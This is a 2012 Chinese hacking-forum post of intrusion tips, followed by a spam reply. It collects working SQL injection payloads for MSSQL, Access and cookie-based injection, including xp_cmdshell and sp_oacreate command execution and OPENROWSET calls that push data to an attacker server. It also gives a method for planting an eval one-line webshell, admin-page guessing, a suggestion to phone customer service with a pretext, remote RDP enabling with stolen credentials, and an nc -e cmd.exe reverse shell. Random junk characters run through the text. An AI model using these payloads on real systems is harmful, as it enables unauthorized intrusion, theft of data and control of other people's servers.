找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3381|回复: 1
打印 上一主题 下一主题

站库分离的方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:41:29 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
SA点数据库分离技术相关3 i; s6 V- p' I% w& p: J# y& V

% _- `& C! i+ s% C' B% ?% @8 K1 n- n2 L3 a: [3 K( T; t" f  ]  S
SA点数据库分离搞法+语句:
, r, Z% X8 r- L7 o% i
- x6 d% e! T! x% x( F! \: k0 S* G注射点不显错,执行下面三条语句页面都返回正常。/ F% l* M! f: Z8 |9 `3 ^
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')8 z" D( t3 i2 {. ^
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask'). T1 ^8 O, l  L% ~% b) F9 p1 A) N! N
and 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')
- z7 R6 f" h/ Z; n+ f可以列目录,判断系统为2000,web与数据库分离
& g  Q" V7 b/ r3 j遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。
3 S, C! x9 N: b6 _在注射点上执行6 G7 n2 ^6 _; X6 V1 g' V( j4 [* y& \
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--
4 _* N* \4 G2 s) y/ n页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP0 w3 O. Q+ \0 t4 o) |2 Q
还有我用NC监听得其他端口都没有得到IP。2 n; j+ ~, m' P* s, E) b
7 X4 ?8 q4 U9 l& ~1 U
通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。) ~/ G/ y  K  p# j, I. I
'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--6 I( z2 H1 [  s1 w' `

+ W9 @. S" y3 w7 [# L; i;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--, h- C9 S8 {. M2 [& U% l

1 q" G7 U& Y0 C8 V现在就猜想是不是数据库是内网而且不能连外网。- z3 l5 f! n+ F& ]+ V, s
- D$ Z0 J3 [- h3 {. S4 ^& q

/ V8 m% X% H  laccess导出txt文本代码
& z' J5 B/ A, s) M2 }7 O0 ~( _* uSELECT * into [test.txt] in 'd:\web\' 'text;' from admin
+ e6 b( _* u8 S. ]* [' B: E$ W" q- P# w3 P
* U$ ?% K" N8 @' o3 a  y! S
% H# s0 @8 Q# H6 h9 g
自动跳转到指定网站代码头
4 T! v; ^& r8 N" F+ G4 c2 E. J+ ~7 M* A<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>
2 Q4 U  O) v1 }" |: s7 q) Q
' ]9 ]) r3 `/ l% w; r9 }& K$ A
/ z) N/ h) W* M/ }入侵java or jsp站点时默认配置文件路径:
; p0 w3 j4 m: m% K) I. f\web-inf\web.xml
4 Z6 K6 I  U* D% K! r6 u3 Gtomcat下的配置文件位置:
  D5 N( r, z; d' d+ t, a\conf\server.xml            (前面加上tomcat路径)) N2 Q- b/ J: w$ d) |0 G
\Tomcat 5.0\webapps\root\web-inf\struts-config.xml
3 P9 ?4 K8 O+ a) q" Q# K2 W
+ f# Y) A- I# [9 o4 T, R4 F& K$ O5 {/ [
3 I) A/ W6 N3 B9 s+ X" i
检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:
. Q1 C" e' P" s7 t9 h& a! v& l, y-1%23+ E) X6 ?; j, H0 A, X# S2 L
>
+ m5 l8 e2 @9 |' K- u6 y) w<
/ _0 }& c+ o' J( N" D2 Q) F- s1'+or+'1'='1
6 j( K# j  D5 b3 mid=8%bf, X$ Q/ i  j- \8 [. ]

* m) B  T4 X0 D8 T2 e/ p全新注入点检测试法:& V. q- g$ {! j: }' {
在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。" U9 k4 |/ T% Q; V: M

. ~* [# M" Q: l/ e+ S在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。  H/ i% W3 B% c7 N1 j6 P& Y1 W! K

8 N6 }) a( B$ y搜索型注入判断方法:
! e; m7 Q. V  i( V4 z北京%' and '1'='1' and '%'='
+ q* g1 D% G9 _* Q6 C北京%' and '1'='2' and '%'='
! s) N' r5 M, W+ _4 o8 M) U! s
- F& `; |" s( u$ @# D7 ?, F% W% P: u9 n6 n
COOKIES注入:6 b* i+ d# r" G; q+ ^. w  W" u

! M: E& x8 F, Mjavascript:alert(document.cookie="id="+escape("51 and 1=1"));
9 i# }& j7 n7 g; H  R" A3 ?% Z6 m- A$ u
2000专业版查看本地登录用户命令:- y& i3 A' l5 Z
net config workstation+ R  g- ]" B, M

7 n8 I5 V8 e1 |! p# Y
5 L& w3 k: l/ r5 b) n2 K) w, @7 D2003下查看ipsec配置和默认防火墙配置命令:
7 I$ j. I& `" `netsh firewall show config0 y. g* Y7 J  a( ]
netsh ipsec static show all7 R5 m# m; A) N  X* X1 X3 x0 u- l8 b
9 X- m, ]; E7 [3 j* h- Y, H; w* b
不指派指定策略命令:
: e% o3 m3 R8 X5 {1 a% V# c2 c* vnetsh ipsec static set policy name=test assign=n  (test是不指派的策略名)
: \1 y6 y8 I( u1 P/ o$ mnetsh ipsec static show policy all  显示策略名% _- x5 V! y2 `/ x2 `

$ N$ Q4 L- Y! A- P* d6 \2 t/ F- ?: I6 h+ v4 \
猜管理员后台小技巧:. }: ^. D1 \3 ~/ O$ T4 k5 N4 h, P' E% B
admin/left.asp - s& G& m2 w0 v: g0 N
admin/main.asp) Y- b7 j' g+ q, u( i( [
admin/top.asp% m- ?% V7 L$ E# I$ q* e
admin/admin.asp ! }( k& `# w5 Z8 J  H. }, U  ?# S
会现出菜单导航,然后迅雷下载全部链接
9 i; a* _, j' m% D( a( j4 ?7 B8 p
3 U2 h  e7 m+ G+ Z/ _4 m
$ M) S6 P+ A6 |1 j社会工程学:
; a8 W' d8 c- \3 {* z% Q* j' Y用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人
, e& L) [$ ?  `6 C然后去骗客服
! T7 n& D$ s8 X0 @# A1 e  g4 V$ ?
$ S- {8 [* Y  C3 @/ D" g7 M- z  h5 F: Z. N8 r* w
统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码: 9 n' S. U$ |2 }& y
查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">, " K8 j3 Y, f( t
  存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。+ I/ ~+ c( p4 T- D# ~' i9 E+ q8 c

& l- ]/ k7 K; {. T
$ _3 e& J8 v9 H5 z1 ^6 i
. B( {( n( @+ A- v" q6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)8 R( z7 @, @, B

* }+ z, t! n8 C- \$ v
# ?+ U3 N' I% ^8 E) D( X+ i0 h- p6 x7 {! ~
CMD加密注册表位置
, d# M- j& r" S; d' m6 R(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor
% ]7 z9 z# ~+ I  R* P1 N; bAutoRun
' K& ?- c6 m$ O* K" n, `( L
5 Y- O4 X( a3 b, Q$ w(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor7 a/ F/ P7 a& j2 x4 y
AutoRun& @2 ^0 c0 c; T' L+ z. J* _

$ j: Z) K* G! s; e3 V2 f
9 X5 y' E; p& V+ r$ e: j& R% o在找注入时搜索Hidden,把他改成test
6 d  c! C2 l* c
& k& A9 t# _% j- ^( r$ f4 S8 F4 ^  W0 I  D4 }6 I7 J* B

% U$ d( z# B& V4 rmstsc /v:IP /console
& e! g+ R  ?; U: [) F( X/ F  D7 _
) I& J+ P. b# T, }8 u) r4 P; t" b3 O$ }; j+ O
一句话开3389:) q9 \/ n& x8 h: c# G9 b. T
5 ?: B" ]; ?' O
最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH>  
+ o- b3 F2 K1 O' V开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1          就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.' w, z/ b& Q- c0 C: ]

& u0 Z$ m! a2 x, M8 n
- p. {" D3 M7 f0 s( ?知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:, L$ }& p2 g# }- w
Insert into admin(user,pwd) values('test','test')
, O  b& F% e( O: L! Y7 W$ b$ @+ p) h  N: D0 L9 Q

5 X/ K& @& a2 ?& _2 Y5 nNC反弹
; U4 y2 }' i/ ^  L! B+ W$ r先在本机执行:     nc -vv -lp 监听的端口     (自己执行)   
3 Q" G+ J9 k6 G9 [9 ?然后在服务器上执行:  nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)# x# _' Y, t2 s" P% A" u# X( x

/ Z" L3 _- [6 A2 t/ J$ d7 [' I5 r3 Y/ t
在脚本入侵过程中要经常常试用%00来确认下参数是否有问题
$ `+ e) m9 i6 i
, j$ F* F: l! j. _% e有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录, U  K' P. l5 _3 ^4 f
例如:
; \0 B( H+ u5 |' b6 Z$ \subst k: d:\www\ 用d盘www目录替代k盘
. @& ^4 W& C7 g6 i/ H2 C; d& C( Tsubst k: /d  解除K盘代替
回复

使用道具 举报

沙发
匿名  发表于 2017-12-20 02:36:51
We are a group of volunteers and starting a new scheme in our community.
Your web site offered us with valuable information to work on. You've done a formidable job and our entire community will
be grateful to you.
Website: Antispur Duo Forte proprieta
回复 支持 反对

使用道具

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表